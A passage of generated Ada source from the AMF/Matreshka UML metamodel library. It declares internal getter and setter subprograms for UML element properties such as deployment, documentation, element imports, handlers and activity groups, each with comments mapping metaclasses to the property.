Slot::definingFeature function Internal_Get_Deployed_Artifact (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- Deployment => Deployment::deployedArtifact function Internal_Get_Deployed_Element (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- Device => DeploymentTarget::deployedElement -- EnumerationLiteral => DeploymentTarget::deployedElement -- ExecutionEnvironment => DeploymentTarget::deployedElement -- ExtensionEnd => DeploymentTarget::deployedElement -- InstanceSpecification => DeploymentTarget::deployedElement -- Node => DeploymentTarget::deployedElement -- Port => DeploymentTarget::deployedElement -- Property => DeploymentTarget::deployedElement function Internal_Get_Deployment (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Deployment (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- DeploymentSpecification => DeploymentSpecification::deployment function Internal_Get_Deployment (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- Device => DeploymentTarget::deployment -- EnumerationLiteral => DeploymentTarget::deployment -- ExecutionEnvironment => DeploymentTarget::deployment -- ExtensionEnd => DeploymentTarget::deployment -- InstanceSpecification => DeploymentTarget::deployment -- Node => DeploymentTarget::deployment -- Port => DeploymentTarget::deployment -- Property => DeploymentTarget::deployment function Internal_Get_Deployment_Location (Self : AMF.Internals.AMF_Element) return Matreshka.Internals.Strings.Shared_String_Access; procedure Internal_Set_Deployment_Location (Self : AMF.Internals.AMF_Element; To : Matreshka.Internals.Strings.Shared_String_Access); -- DeploymentSpecification => DeploymentSpecification::deploymentLocation function Internal_Get_Destroy_At (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Destroy_At (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- LinkEndDestructionData => LinkEndDestructionData::destroyAt function Internal_Get_Direction (Self : AMF.Internals.AMF_Element) return AMF.UML.UML_Parameter_Direction_Kind; procedure Internal_Set_Direction (Self : AMF.Internals.AMF_Element; To : AMF.UML.UML_Parameter_Direction_Kind); -- Parameter => Parameter::direction function Internal_Get_Do_Activity (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Do_Activity (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- FinalState => State::doActivity -- State => State::doActivity function Internal_Get_Documentation (Self : AMF.Internals.AMF_Element) return Matreshka.Internals.Strings.Shared_String_Access; procedure Internal_Set_Documentation (Self : AMF.Internals.AMF_Element; To : Matreshka.Internals.Strings.Shared_String_Access); -- UMLActivityDiagram => Diagram::documentation -- UMLClassDiagram => Diagram::documentation -- UMLComponentDiagram => Diagram::documentation -- UMLCompositeStructureDiagram => Diagram::documentation -- UMLDeploymentDiagram => Diagram::documentation -- UMLInteractionDiagram => Diagram::documentation -- UMLObjectDiagram => Diagram::documentation -- UMLPackageDiagram => Diagram::documentation -- UMLProfileDiagram => Diagram::documentation -- UMLStateMachineDiagram => Diagram::documentation -- UMLUseCaseDiagram => Diagram::documentation function Internal_Get_Edge (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- Activity => Activity::edge -- ActivityPartition => ActivityPartition::edge -- ConditionalNode => StructuredActivityNode::edge -- ExpansionRegion => StructuredActivityNode::edge -- LoopNode => StructuredActivityNode::edge -- SequenceNode => StructuredActivityNode::edge -- StructuredActivityNode => StructuredActivityNode::edge function Internal_Get_Effect (Self : AMF.Internals.AMF_Element) return AMF.UML.Optional_UML_Parameter_Effect_Kind; procedure Internal_Set_Effect (Self : AMF.Internals.AMF_Element; To : AMF.UML.Optional_UML_Parameter_Effect_Kind); -- Parameter => Parameter::effect function Internal_Get_Effect (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Effect (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- ProtocolTransition => Transition::effect -- Transition => Transition::effect function Internal_Get_Element_Import (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- Activity => Namespace::elementImport -- Actor => Namespace::elementImport -- Artifact => Namespace::elementImport -- Association => Namespace::elementImport -- AssociationClass => Namespace::elementImport -- Class => Namespace::elementImport -- Collaboration => Namespace::elementImport -- CommunicationPath => Namespace::elementImport -- Component => Namespace::elementImport -- ConditionalNode => Namespace::elementImport -- DataType => Namespace::elementImport -- DeploymentSpecification => Namespace::elementImport -- Device => Namespace::elementImport -- Enumeration => Namespace::elementImport -- ExecutionEnvironment => Namespace::elementImport -- ExpansionRegion => Namespace::elementImport -- Extension => Namespace::elementImport -- FinalState => Namespace::elementImport -- FunctionBehavior => Namespace::elementImport -- InformationItem => Namespace::elementImport -- Interaction => Namespace::elementImport -- InteractionOperand => Namespace::elementImport -- Interface => Namespace::elementImport -- LoopNode => Namespace::elementImport -- Model => Namespace::elementImport -- Node => Namespace::elementImport -- OpaqueBehavior => Namespace::elementImport -- Operation => Namespace::elementImport -- Package => Namespace::elementImport -- PrimitiveType => Namespace::elementImport -- Profile => Namespace::elementImport -- ProtocolStateMachine => Namespace::elementImport -- ProtocolTransition => Namespace::elementImport -- Reception => Namespace::elementImport -- Region => Namespace::elementImport -- SequenceNode => Namespace::elementImport -- Signal => Namespace::elementImport -- State => Namespace::elementImport -- StateMachine => Namespace::elementImport -- Stereotype => Namespace::elementImport -- StructuredActivityNode => Namespace::elementImport -- Transition => Namespace::elementImport -- UseCase => Namespace::elementImport function Internal_Get_Element_In_Compartment (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- UMLCompartment => UMLCompartment::elementInCompartment function Internal_Get_Enclosing_Interaction (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Enclosing_Interaction (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- ActionExecutionSpecification => InteractionFragment::enclosingInteraction -- BehaviorExecutionSpecification => InteractionFragment::enclosingInteraction -- CombinedFragment => InteractionFragment::enclosingInteraction -- ConsiderIgnoreFragment => InteractionFragment::enclosingInteraction -- Continuation => InteractionFragment::enclosingInteraction -- DestructionOccurrenceSpecification => InteractionFragment::enclosingInteraction -- ExecutionOccurrenceSpecification => InteractionFragment::enclosingInteraction -- Interaction => InteractionFragment::enclosingInteraction -- InteractionOperand => InteractionFragment::enclosingInteraction -- InteractionUse => InteractionFragment::enclosingInteraction -- MessageOccurrenceSpecification => InteractionFragment::enclosingInteraction -- OccurrenceSpecification => InteractionFragment::enclosingInteraction -- PartDecomposition => InteractionFragment::enclosingInteraction -- StateInvariant => InteractionFragment::enclosingInteraction function Internal_Get_Enclosing_Operand (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Enclosing_Operand (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- ActionExecutionSpecification => InteractionFragment::enclosingOperand -- BehaviorExecutionSpecification => InteractionFragment::enclosingOperand -- CombinedFragment => InteractionFragment::enclosingOperand -- ConsiderIgnoreFragment => InteractionFragment::enclosingOperand -- Continuation => InteractionFragment::enclosingOperand -- DestructionOccurrenceSpecification => InteractionFragment::enclosingOperand -- ExecutionOccurrenceSpecification => InteractionFragment::enclosingOperand -- Interaction => InteractionFragment::enclosingOperand -- InteractionOperand => InteractionFragment::enclosingOperand -- InteractionUse => InteractionFragment::enclosingOperand -- MessageOccurrenceSpecification => InteractionFragment::enclosingOperand -- OccurrenceSpecification => InteractionFragment::enclosingOperand -- PartDecomposition => InteractionFragment::enclosingOperand -- StateInvariant => InteractionFragment::enclosingOperand function Internal_Get_End (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- Connector => Connector::end -- ExtensionEnd => ConnectableElement::end -- Parameter => ConnectableElement::end -- Port => ConnectableElement::end -- Property => ConnectableElement::end -- Variable => ConnectableElement::end function Internal_Get_End (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_End (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- LinkEndCreationData => LinkEndData::end -- LinkEndData => LinkEndData::end -- LinkEndDestructionData => LinkEndData::end -- ReadLinkObjectEndAction => ReadLinkObjectEndAction::end function Internal_Get_End_Data (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- CreateLinkAction => CreateLinkAction::endData -- CreateLinkObjectAction => CreateLinkAction::endData -- DestroyLinkAction => DestroyLinkAction::endData -- ReadLinkAction => LinkAction::endData function Internal_Get_End_Type (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- Association => Association::endType -- AssociationClass => Association::endType -- CommunicationPath => Association::endType -- Extension => Association::endType function Internal_Get_Entry (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- ConnectionPointReference => ConnectionPointReference::entry function Internal_Get_Entry (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Entry (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- FinalState => State::entry -- State => State::entry function Internal_Get_Enumeration (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Enumeration (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- EnumerationLiteral => EnumerationLiteral::enumeration function Internal_Get_Event (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- DurationObservation => DurationObservation::event function Internal_Get_Event (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Event (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- TimeObservation => TimeObservation::event -- Trigger => Trigger::event function Internal_Get_Exception (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Exception (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- RaiseExceptionAction => RaiseExceptionAction::exception function Internal_Get_Exception_Input (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Exception_Input (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- ExceptionHandler => ExceptionHandler::exceptionInput function Internal_Get_Exception_Type (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- ExceptionHandler => ExceptionHandler::exceptionType function Internal_Get_Executable_Node (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- SequenceNode => SequenceNode::executableNode function Internal_Get_Execution (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Execution (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- ExecutionOccurrenceSpecification => ExecutionOccurrenceSpecification::execution function Internal_Get_Execution_Location (Self : AMF.Internals.AMF_Element) return Matreshka.Internals.Strings.Shared_String_Access; procedure Internal_Set_Execution_Location (Self : AMF.Internals.AMF_Element; To : Matreshka.Internals.Strings.Shared_String_Access); -- DeploymentSpecification => DeploymentSpecification::executionLocation function Internal_Get_Exit (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- ConnectionPointReference => ConnectionPointReference::exit function Internal_Get_Exit (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Exit (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- FinalState => State::exit -- State => State::exit function Internal_Get_Expr (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Expr (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- Duration => Duration::expr -- TimeExpression => TimeExpression::expr function Internal_Get_Extend (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- UseCase => UseCase::extend function Internal_Get_Extended_Case (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Extended_Case (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- Extend => Extend::extendedCase function Internal_Get_Extended_Region (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Extended_Region (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- Region => Region::extendedRegion function Internal_Get_Extended_Signature (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- RedefinableTemplateSignature => RedefinableTemplateSignature::extendedSignature function Internal_Get_Extended_State_Machine (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- ProtocolStateMachine => StateMachine::extendedStateMachine -- StateMachine => StateMachine::extendedStateMachine function Internal_Get_Extension (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- Activity => Class::extension -- AssociationClass => Class::extension -- Class => Class::extension -- Component => Class::extension -- Device => Class::extension -- ExecutionEnvironment => Class::extension -- FunctionBehavior => Class::extension -- Interaction => Class::extension -- Node => Class::extension -- OpaqueBehavior => Class::extension -- ProtocolStateMachine => Class::extension -- StateMachine => Class::extension -- Stereotype => Class::extension function Internal_Get_Extension (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Extension (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- Extend => Extend::extension function Internal_Get_Extension_Location (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- Extend => Extend::extensionLocation function Internal_Get_Extension_Point (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- UseCase => UseCase::extensionPoint function Internal_Get_Feature (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- Activity => Classifier::feature -- Actor => Classifier::feature -- Artifact => Classifier::feature -- Association => Classifier::feature -- AssociationClass => Classifier::feature -- Class => Classifier::feature -- Collaboration => Classifier::feature -- CommunicationPath => Classifier::feature -- Component => Classifier::feature -- DataType => Classifier::feature -- DeploymentSpecification => Classifier::feature -- Device => Classifier::feature -- Enumeration => Classifier::feature -- ExecutionEnvironment => Classifier::feature -- Extension => Classifier::feature -- FunctionBehavior => Classifier::feature -- InformationItem => Classifier::feature -- Interaction => Classifier::feature -- Interface => Classifier::feature -- Node => Classifier::feature -- OpaqueBehavior => Classifier::feature -- PrimitiveType => Classifier::feature -- ProtocolStateMachine => Classifier::feature -- Signal => Classifier::feature -- StateMachine => Classifier::feature -- Stereotype => Classifier::feature -- UseCase => Classifier::feature function Internal_Get_Featuring_Classifier (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- Connector => Feature::featuringClassifier -- ExtensionEnd => Feature::featuringClassifier -- Operation => Feature::featuringClassifier -- Port => Feature::featuringClassifier -- Property => Feature::featuringClassifier -- Reception => Feature::featuringClassifier function Internal_Get_File_Name (Self : AMF.Internals.AMF_Element) return Matreshka.Internals.Strings.Shared_String_Access; procedure Internal_Set_File_Name (Self : AMF.Internals.AMF_Element; To : Matreshka.Internals.Strings.Shared_String_Access); -- Artifact => Artifact::fileName -- DeploymentSpecification => Artifact::fileName function Internal_Get_Finish (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Finish (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- ActionExecutionSpecification => ExecutionSpecification::finish -- BehaviorExecutionSpecification => ExecutionSpecification::finish function Internal_Get_First (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_First (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- TestIdentityAction => TestIdentityAction::first function Internal_Get_First_Event (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Boolean; -- DurationConstraint => DurationConstraint::firstEvent -- DurationObservation => DurationObservation::firstEvent function Internal_Get_First_Event (Self : AMF.Internals.AMF_Element) return AMF.Optional_Boolean; procedure Internal_Set_First_Event (Self : AMF.Internals.AMF_Element; To : AMF.Optional_Boolean); -- TimeConstraint => TimeConstraint::firstEvent function Internal_Get_First_Event (Self : AMF.Internals.AMF_Element) return Boolean; procedure Internal_Set_First_Event (Self : AMF.Internals.AMF_Element; To : Boolean); -- TimeObservation => TimeObservation::firstEvent function Internal_Get_Font_Name (Self : AMF.Internals.AMF_Element) return Matreshka.Internals.Strings.Shared_String_Access; procedure Internal_Set_Font_Name (Self : AMF.Internals.AMF_Element; To : Matreshka.Internals.Strings.Shared_String_Access); -- UMLStyle => UMLStyle::fontName function Internal_Get_Font_Size (Self : AMF.Internals.AMF_Element) return AMF.Optional_Real; procedure Internal_Set_Font_Size (Self : AMF.Internals.AMF_Element; To : AMF.Optional_Real); -- UMLStyle => UMLStyle::fontSize function Internal_Get_Formal (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Formal (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- TemplateParameterSubstitution => TemplateParameterSubstitution::formal function Internal_Get_Formal_Gate (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- Interaction => Interaction::formalGate function Internal_Get_Format (Self : AMF.Internals.AMF_Element) return Matreshka.Internals.Strings.Shared_String_Access; procedure Internal_Set_Format (Self : AMF.Internals.AMF_Element; To : Matreshka.Internals.Strings.Shared_String_Access); -- Image => Image::format function Internal_Get_Fragment (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- Interaction => Interaction::fragment -- InteractionOperand => InteractionOperand::fragment function Internal_Get_From_Action (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_From_Action (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- ActionInputPin => ActionInputPin::fromAction function Internal_Get_General (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- Activity => Classifier::general -- Actor => Classifier::general -- Artifact => Classifier::general -- Association => Classifier::general -- AssociationClass => Classifier::general -- Class => Classifier::general -- Collaboration => Classifier::general -- CommunicationPath => Classifier::general -- Component => Classifier::general -- DataType => Classifier::general -- DeploymentSpecification => Classifier::general -- Device => Classifier::general -- Enumeration => Classifier::general -- ExecutionEnvironment => Classifier::general -- Extension => Classifier::general -- FunctionBehavior => Classifier::general -- InformationItem => Classifier::general -- Interaction => Classifier::general -- Interface => Classifier::general -- Node => Classifier::general -- OpaqueBehavior => Classifier::general -- PrimitiveType => Classifier::general -- ProtocolStateMachine => Classifier::general -- Signal => Classifier::general -- StateMachine => Classifier::general -- Stereotype => Classifier::general -- UseCase => Classifier::general function Internal_Get_General (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_General (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- Generalization => Generalization::general function Internal_Get_General_Machine (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_General_Machine (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- ProtocolConformance => ProtocolConformance::generalMachine function Internal_Get_General_Ordering (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- ActionExecutionSpecification => InteractionFragment::generalOrdering -- BehaviorExecutionSpecification => InteractionFragment::generalOrdering -- CombinedFragment => InteractionFragment::generalOrdering -- ConsiderIgnoreFragment => InteractionFragment::generalOrdering -- Continuation => InteractionFragment::generalOrdering -- DestructionOccurrenceSpecification => InteractionFragment::generalOrdering -- ExecutionOccurrenceSpecification => InteractionFragment::generalOrdering -- Interaction => InteractionFragment::generalOrdering -- InteractionOperand => InteractionFragment::generalOrdering -- InteractionUse => InteractionFragment::generalOrdering -- MessageOccurrenceSpecification => InteractionFragment::generalOrdering -- OccurrenceSpecification => InteractionFragment::generalOrdering -- PartDecomposition => InteractionFragment::generalOrdering -- StateInvariant => InteractionFragment::generalOrdering function Internal_Get_Generalization (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- Activity => Classifier::generalization -- Actor => Classifier::generalization -- Artifact => Classifier::generalization -- Association => Classifier::generalization -- AssociationClass => Classifier::generalization -- Class => Classifier::generalization -- Collaboration => Classifier::generalization -- CommunicationPath => Classifier::generalization -- Component => Classifier::generalization -- DataType => Classifier::generalization -- DeploymentSpecification => Classifier::generalization -- Device => Classifier::generalization -- Enumeration => Classifier::generalization -- ExecutionEnvironment => Classifier::generalization -- Extension => Classifier::generalization -- FunctionBehavior => Classifier::generalization -- GeneralizationSet => GeneralizationSet::generalization -- InformationItem => Classifier::generalization -- Interaction => Classifier::generalization -- Interface => Classifier::generalization -- Node => Classifier::generalization -- OpaqueBehavior => Classifier::generalization -- PrimitiveType => Classifier::generalization -- ProtocolStateMachine => Classifier::generalization -- Signal => Classifier::generalization -- StateMachine => Classifier::generalization -- Stereotype => Classifier::generalization -- UseCase => Classifier::generalization function Internal_Get_Generalization_Set (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- Generalization => Generalization::generalizationSet function Internal_Get_Group (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- Activity => Activity::group function Internal_Get_Guard (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Guard (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- ControlFlow => ActivityEdge::guard -- InteractionOperand => InteractionOperand::guard -- ObjectFlow => ActivityEdge::guard -- ProtocolTransition => Transition::guard -- Transition => Transition::guard function Internal_Get_Handler (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- AcceptCallAction => ExecutableNode::handler -- AcceptEventAction => ExecutableNode::handler -- AddStructuralFeatureValueAction => ExecutableNode::handler -- AddVariableValueAction => ExecutableNode::handler -- BroadcastSignalAction => ExecutableNode::handler -- CallBehaviorAction => ExecutableNode::handler -- CallOperationAction => ExecutableNode::handler -- ClearAssociationAction => ExecutableNode::handler -- ClearStructuralFeatureAction => ExecutableNode::handler -- ClearVariableAction => ExecutableNode::handler -- ConditionalNode => ExecutableNode::handler -- CreateLinkAction => ExecutableNode::handler -- CreateLinkObjectAction => ExecutableNode::handler -- CreateObjectAction => ExecutableNode::handler -- DestroyLinkAction => ExecutableNode::handler -- DestroyObjectAction => ExecutableNode::handler -- ExpansionRegion => ExecutableNode::handler -- LoopNode => ExecutableNode::handler -- OpaqueAction => ExecutableNode::handler -- RaiseExceptionAction => ExecutableNode::handler -- ReadExtentAction => ExecutableNode::handler -- ReadIsClassifiedObjectAction => ExecutableNode::handler -- ReadLinkAction => ExecutableNode::handler -- ReadLinkObjectEndAction => ExecutableNode::handler -- ReadLinkObjectEndQualifierAction => ExecutableNode::handler -- ReadSelfAction => ExecutableNode::handler -- ReadStructuralFeatureAction => ExecutableNode::handler -- ReadVariableAction => ExecutableNode::handler -- ReclassifyObjectAction => ExecutableNode::handler -- ReduceAction => ExecutableNode::handler -- RemoveStructuralFeatureValueAction => ExecutableNode::handler -- RemoveVariableValueAction => ExecutableNode::handler -- ReplyAction => ExecutableNode::handler -- SendObjectAction => ExecutableNode::handler -- SendSignalAction => ExecutableNode::handler -- SequenceNode => ExecutableNode::handler -- StartClassifierBehaviorAction => ExecutableNode::handler -- StartObjectBehaviorAction => ExecutableNode::handler -- StructuredActivityNode => ExecutableNode::handler -- TestIdentityAction => ExecutableNode::handler -- UnmarshallAction => ExecutableNode::handler -- ValueSpecificationAction => ExecutableNode::handler function Internal_Get_Handler_Body (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Handler_Body (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- ExceptionHandler => ExceptionHandler::handlerBody function Internal_Get_Heading (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Heading (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- UMLActivityDiagram => UMLDiagram::heading -- UMLClassDiagram => UMLDiagram::heading -- UMLComponentDiagram => UMLDiagram::heading -- UMLCompositeStructureDiagram => UMLDiagram::heading -- UMLDeploymentDiagram => UMLDiagram::heading -- UMLInteractionDiagram => UMLDiagram::heading -- UMLObjectDiagram => UMLDiagram::heading -- UMLPackageDiagram => UMLDiagram::heading -- UMLProfileDiagram => UMLDiagram::heading -- UMLStateMachineDiagram => UMLDiagram::heading -- UMLUseCaseDiagram => UMLDiagram::heading function Internal_Get_Icon (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- Stereotype => Stereotype::icon function Internal_Get_Implementing_Classifier (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Implementing_Classifier (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- InterfaceRealization => InterfaceRealization::implementingClassifier function Internal_Get_Imported_Element (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Imported_Element (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- ElementImport => ElementImport::importedElement function Internal_Get_Imported_Member (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- Activity => Namespace::importedMember -- Actor => Namespace::importedMember -- Artifact => Namespace::importedMember -- Association => Namespace::importedMember -- AssociationClass => Namespace::importedMember -- Class => Namespace::importedMember -- Collaboration => Namespace::importedMember -- CommunicationPath => Namespace::importedMember -- Component => Namespace::importedMember -- ConditionalNode => Namespace::importedMember -- DataType => Namespace::importedMember -- DeploymentSpecification => Namespace::importedMember -- Device => Namespace::importedMember -- Enumeration => Namespace::importedMember -- ExecutionEnvironment => Namespace::importedMember -- ExpansionRegion => Namespace::importedMember -- Extension => Namespace::importedMember -- FinalState => Namespace::importedMember -- FunctionBehavior => Namespace::importedMember -- InformationItem => Namespace::importedMember -- Interaction => Namespace::importedMember -- InteractionOperand => Namespace::importedMember -- Interface => Namespace::importedMember -- LoopNode => Namespace::importedMember -- Model => Namespace::importedMember -- Node => Namespace::importedMember -- OpaqueBehavior => Namespace::importedMember -- Operation => Namespace::importedMember -- Package => Namespace::importedMember -- PrimitiveType => Namespace::importedMember -- Profile => Namespace::importedMember -- ProtocolStateMachine => Namespace::importedMember -- ProtocolTransition => Namespace::importedMember -- Reception => Namespace::importedMember -- Region => Namespace::importedMember -- SequenceNode => Namespace::importedMember -- Signal => Namespace::importedMember -- State => Namespace::importedMember -- StateMachine => Namespace::importedMember -- Stereotype => Namespace::importedMember -- StructuredActivityNode => Namespace::importedMember -- Transition => Namespace::importedMember -- UseCase => Namespace::importedMember function Internal_Get_Imported_Package (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Imported_Package (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- PackageImport => PackageImport::importedPackage function Internal_Get_Importing_Namespace (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_Importing_Namespace (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- ElementImport => ElementImport::importingNamespace -- PackageImport => PackageImport::importingNamespace function Internal_Get_In_Activity (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Element; procedure Internal_Set_In_Activity (Self : AMF.Internals.AMF_Element; To : AMF.Internals.AMF_Element); -- ActivityPartition => ActivityGroup::inActivity -- ConditionalNode => ActivityGroup::inActivity -- ExpansionRegion => ActivityGroup::inActivity -- InterruptibleActivityRegion => ActivityGroup::inActivity -- LoopNode => ActivityGroup::inActivity -- SequenceNode => ActivityGroup::inActivity -- StructuredActivityNode => ActivityGroup::inActivity function Internal_Get_In_Group (Self : AMF.Internals.AMF_Element) return AMF.Internals.AMF_Collection_Of_Element; -- AcceptCallAction => ActivityNode::inGroup -- AcceptEventAction => ActivityNode::inGroup -- ActionInputPin => ActivityNode::inGroup -- ActivityFinalNode => ActivityNode::inGroup -- ActivityParameterNode => ActivityNode::inGroup -- AddStructuralFeatureValueAction => ActivityNode::inGroup -- AddVariableValueAction => ActivityNode::inGroup -- BroadcastSignalAction => ActivityNode::inGroup -- CallBehaviorAction => ActivityNode::inGroup -- CallOperationAction => ActivityNode::inGroup -- CentralBufferNode => ActivityNode::inGroup -- ClearAssociationAction => ActivityNode::inGroup -- ClearStructuralFeatureAction => ActivityNode::inGroup -- ClearVariableAction => ActivityNode::inGroup -- ConditionalNode => ActivityNode::inGroup -- ControlFlow => ActivityEdge::inGroup -- CreateLinkAction => ActivityNode::inGroup -- CreateLinkObjectAction => ActivityNode::inGroup -- CreateObjectAction => ActivityNode::inGroup -- DataStoreNode => ActivityNode::inGroup -- DecisionNode => ActivityNode::inGroup -- DestroyLinkAction => ActivityNode::inGroup -- DestroyObjectAction => ActivityNode::inGroup -- ExpansionNode => ActivityNode::inGroup -- ExpansionRegion => ActivityNode::inGroup -- FlowFinalNode => ActivityNode::inGroup -- ForkNode => ActivityNode::inGroup -- InitialNode => ActivityNode::inGroup -- InputPin => ActivityNode::inGroup -- JoinNode => ActivityNode::inGroup -- LoopNode => ActivityNode::inGroup -- MergeNode => ActivityNode::inGroup -- ObjectFlow => ActivityEdge::inGroup -- OpaqueAction => ActivityNode::inGroup -- OutputPin => ActivityNode::inGroup -- RaiseExceptionAction => ActivityNode::inGroup -- ReadExtentAction => ActivityNode::inGroup -- ReadIsClassifiedObjectAction => ActivityNode::inGroup -- ReadLinkAction => ActivityNode::inGroup -- ReadLinkObjectEndAction => ActivityNode::inGroup -- ReadLinkObjectEndQualifierAction => ActivityNode::inGroup -- ReadSelfAction => 